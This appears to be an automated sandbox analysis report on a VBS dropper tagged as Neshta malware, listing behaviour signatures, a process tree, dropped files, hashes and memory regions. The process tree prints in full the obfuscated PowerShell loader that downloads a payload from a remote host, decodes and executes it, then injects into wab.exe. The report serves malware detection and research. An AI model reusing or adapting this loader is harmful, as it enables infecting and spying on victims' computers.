Overview

overview

10

Static

static

1

aeda53046f...01.vbs

windows7-x64

10

aeda53046f...01.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    111s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24/05/2024, 13:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401.vbs

  • Size

    72KB

  • MD5

    673fa3ac445c7ae448c49ef3d154b4e8

  • SHA1

    097eaa21e81bf37a12a338e33366d429ef6a2ab9

  • SHA256

    aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401

  • SHA512

    67d679238efe97f51db748c2c7bd916417f354d6fc8920c8df999e96bab63810707bd51473c4487db86f18e299831f0cc749a203c1ea58a5b3af0951ae3a406c

  • SSDEEP

    1536:PddWp7iJTLvOMp4pR/1jvXgsVIx/4f3xeKG7lYY8zD+tNfvlEiEG9A:P+YrOMSn/Nv/VggheKebyiN3oG9A

Score
10/10
neshtapersistencespyware

Malware Config

Signatures

  • Neshta

    Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.

    persistencespywareneshta
  • Blocklisted process makes network request 5 IoCs
  • Loads dropped DLL 1 IoCs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1740
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
        3⤵
          PID:524
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingueEnstauDjellrBonde=GleamN ,elfe Bifew So.a-ugestOU.derb DisejAbeloe SunbcBlowjtGerha Re,seSFrejdy Knogs NatitDuk,eeDro.dmBacch.UnderNBilleePa,aptRedis.ThwarWConiieCholebBetteCChatslanth.iExempeRig enGapgltLov,a ');Kolesterol (Lnkampene 'Desig$ForreBudebla IsocdCitesiTil,sn.edaleCyb ruS kverUbluf.S.preH.gtnie,inteaSpe,edPateteBur.nrskadesBayon[Alask$LedigOOdinerTapisgNonapaVindknDe peiS rensspecim FruieCenterDegassGuilb],perm=kiloc$.edboScapsikGldssoSicklvU rembWrestrHusblas,phonD.moud Un,vssearcbLindgePlangk ParamCalvipTallie Ruinl ProtsReklaeRinghs Sg,f ');$Frakoblende127=Lnkampene 'ImproBSightaS.vsadAntipi MetanNonane Ejeru .uggr Spil. skraDKraknoGemenwAntipn eroslOutfeo BefuaShakedVerruFNintui Armel A.paeDebat(Wilda$S.ineSBe prkB rdsaPhoohd Evo eTre jvtjeneoSl,evl AdjodByzaneDamebrStboln.ofdieSemim,Spytk$HumorEFin.nk C,rbvPi.laiBougap Afmae avebr Fyrai SikanMutedgM more Strar Goddn,uneneConfu)Bespn ';$Frakoblende127=$Bnke[1]+$Frakoblende127;$Ekviperingerne=$Bnke[0];Kolesterol (Lnkampene 'Reall$HerlugThur,lTrommoSkrmsbGammiaKltrildrjed:UdspeVKansaichurrnToxicd timaiElektggyrit=Trill(WeheeT gemme.italsCapybtP.rli- ,ccePrevisaSti.ltGevanhPeyot Parce$KosttE Bi lkBodgev JyndikailypProdue,rallrUnm.diN.nrenSammegEnd ce HashrGliomnUndereGymno)Desme ');while (!$Vindig) {Kolesterol (Lnkampene 'Merce$Pr vagPrdiklClisto Forkb rieaTra dl .els:BeskyVHydr.eUnionn ranstBedvee PallkS mfuj.pgatoSrge.lUneneeBintjnmegal= Fjo.$ sandt,dblor efreuTaleseampli ') ;Kolesterol $Frakoblende127;Kolesterol (Lnkampene 'TilskSRokketNed,uaUlde r,emictlanda-HimmeS WicklPurpoeU,frseAct,apProvi L.ndb4Ajour ');Kolesterol (Lnkampene 'Mo.he$Impovg Unf l Mo,ioS.bpebGryntaFibr lBromi: U,ivVSlubriStuklnOmbindHyperiDrivag.egit= .ost(T,vemTAtom e andos ,vertVandi-JenkrPtjeneaReamatHamsthOvers Bj.ne$Hyp,nEKolpokRegulvlameligolilpSangveFolkerC ickiJordrnNelisgCeremeMultirTi lbn AfdeePet r)Pre.u ') ;Kolesterol (Lnkampene 'Odori$AgerbgSubselO teto S,deb,orinaMonumlS mme:KbekrRMgle.eStibis Tobau Fin,sDrbercMontiiR.sertSeksuaInvesnHi.litKeram=Kroni$TaktrgRagsolGenn,oWiyatbSt,afaRygsjlF.lde:S udrRv,rmoeUnchasSqualpHenwois.ederKedloaUdtaltBrevaiBo,ennDisarg aafr+ Cho,+Antih%antia$Unsq R PaksuOmgrdfUnfu.fEngleeReindrRetrosKonsuk Socee IrrerTakah.EuklicKo.stoFeticusank,nRingetFr,ss ') ;$Skadevolderne=$Ruffersker[$Resuscitant];}$Stealth=317356;$Smeltediglen=28607;Kolesterol (Lnkampene 'Col,u$,flivgs,ratlExploo La,hbBarosaP,olol,arco:Hvse.ORunprlMindaeRundsrtetr.aNonadcOmegneNdri,oCaud uSav ns,arbu Circu=bred, TiltnGundereover.tOrals-HaglsCTmreroClinon CenttTilfleVedrrnKle,itPromo Caram$Pale.ESaarsk ForkvTophaiForsmpExte eMoralr,kudsi.rasonTugbog.himoeKommir ondenSubtoecoutu ');Kolesterol (Lnkampene 'Nonme$.dsmigDej klUnle oforskbSheeta Tastl A lg:,nkebL Bru,hD nskuPostonAbe,idScolys Srad ,ejlt=Kasta Subst[GalloS.havayMaksisGradst T aneS ejlmI.elr.Ol erC EchooPsam,n,olkevAprjteApinarNoum tPrees] Vege:Local:Cal,rFBjninrDekreo Ald mEp,ncB NaiaaU,ryksUlykkeUnseg6Laund4 ,estSM.nottOmnidr CohoiJambonFaraog efor(udl,d$.atonOIsokol usleFrontr.elata Aktic SpoueCesiuo ligauTotemsBar.e) Bac. ');Kolesterol (Lnkampene 'Ae th$.rikkg,arbel .eneo KontbVa.utaSu lelBlomk:Pr,nkSRgforuTiskdbBalkogS.btrr AberoUnoveuYeastpMicrosNeome B ill=Slag, Unsto[Dia,lS Metoy boghsEx,ostForbee Ka fmDr.ek.OsteaT Safte.refaxBundgtSyndi.Une.tE,erminIndimcR sunoJessed ForniFlodhn R,tigArcad]Bygrn:Speci:FlugtA adipSStrobCBemgtIRadenI.lust.EkspeG ipleI,hestGydn,SSpredtGrantr ,ppliDeas,nChmilgPo en(Besla$ BlodL Tr,ahDemaruBa.esnKnowhdBade.sKunde)V,rol ');Kolesterol (Lnkampene 't.esi$PreregKvidrlNo.imo PrisbJawfia Thi,l Eksp:Cru hKL.skojBrugeoM,saprorbict Lys eTrundlT legeBlanknSinapsVel,e=Su,er$.egadSW.incuSoffibResergBrachrPannio.ejdiuEnceppDecigs Avis. SpaesN ggauCominbDagsrs ap ltP,ilorFre riIdocrnHabi.gConse(Kobiu$ KribSPo emt.lpaseSothiaPrelalSto it S rahInte ,Kumme$T.bleSMonosmR,esueAfkorlN.ttetEfterePrveld K.ruiMethagNukasl Sowde Inven,uleb)Modta ');Kolesterol $Kjortelens;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
            4⤵
              PID:580
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Loads dropped DLL
              • Modifies system executable filetype association
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              PID:2120

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\MSOCache\ALLUSE~1\{90140~1\dwtrig20.exe
        Filesize

        547KB

        MD5

        fa9e52ffa7ca60c38d490abd96cb3952

        SHA1

        b8ef0fafe68035128978f0383fab3863301aa62e

        SHA256

        d416c89d8a396915106fb2462430d90bbe1be05c444098bfc671bb3d12089d96

        SHA512

        26d959e451ee66a26ead7b7971b3993c3f6882abd912ba5a641215cb90f18bbb7ac94e7ae3008bbf2c1c497e6989b8a607b63967b6dd3aa1ef4a5a953342d1ce

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        69311b57a797597ee3e715f6b7b0e98a

        SHA1

        26265ceea689374bd468b303ac204eabbb661c73

        SHA256

        75e9fea99e1ff84f1e8366f97677c7480a8d7ae461aced6fed754506dcdbebfb

        SHA512

        3a4bb4be97474685152cdd5f0becfc2a98b3d19a451ad163c4399dcfd463f001646d1991b70d78b70bc2c594221dd3d873fcb63e0fb791a5adb911790407bccd

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\TarA2AC.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QJS36JD9DCGSD4PSF3LW.temp
        Filesize

        7KB

        MD5

        f63de2af3f69da965e8c083eabd289b4

        SHA1

        3b3c288c7d8dbf27e3f093bfc5b189fcd02e0781

        SHA256

        deba92f11f5d140b8b1522ac48f1b9712c755a1034f89753bcb6f864212f0758

        SHA512

        98a7e96a1d1ab93d42157572e768adaded61f88655bfd372bccfa49fa78e07bdfa09f3ca16b0b69eb7d72d1391c75cf51bbead8c02ef616eae493c4c803c5e98

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Omrystninger.Dim
        Filesize

        450KB

        MD5

        6d9b6accceeb8d1903ff212fe516a08e

        SHA1

        dde8ef0bd8cee4dd7593de179183a6a0afb5e1cc

        SHA256

        2f65e63154ec396206d3ca6ce8ac0210b09598f0c61e6038161ad66fb5e80138

        SHA512

        48031eff35c6ef2dc0c05e750ddc960c6031fbb16f41843f0f0c01a0c59d76b71283793428f20974800ff880555606d6fbb4e1ad8f48220a38e9725ed6eac420

        Download Submit

      • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
        Filesize

        252KB

        MD5

        9e2b9928c89a9d0da1d3e8f4bd96afa7

        SHA1

        ec66cda99f44b62470c6930e5afda061579cde35

        SHA256

        8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

        SHA512

        2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

        Download Submit

      • memory/1740-58-0x000007FEF5E0E000-0x000007FEF5E0F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1740-7-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1740-10-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1740-9-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1740-8-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1740-4-0x000007FEF5E0E000-0x000007FEF5E0F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1740-59-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1740-5-0x000000001B230000-0x000000001B512000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1740-6-0x00000000023F0000-0x00000000023F8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1740-11-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1740-94-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2120-90-0x0000000000E80000-0x0000000001EE2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2120-63-0x0000000000E80000-0x0000000001EE2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2120-167-0x0000000000E80000-0x0000000001EE2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2120-174-0x0000000000E80000-0x0000000001EE2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2120-175-0x0000000000E80000-0x0000000001EE2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2120-177-0x0000000000E80000-0x0000000001EE2000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2800-61-0x0000000006160000-0x000000000B757000-memory.dmp

        Filesize

        86.0MB

        Download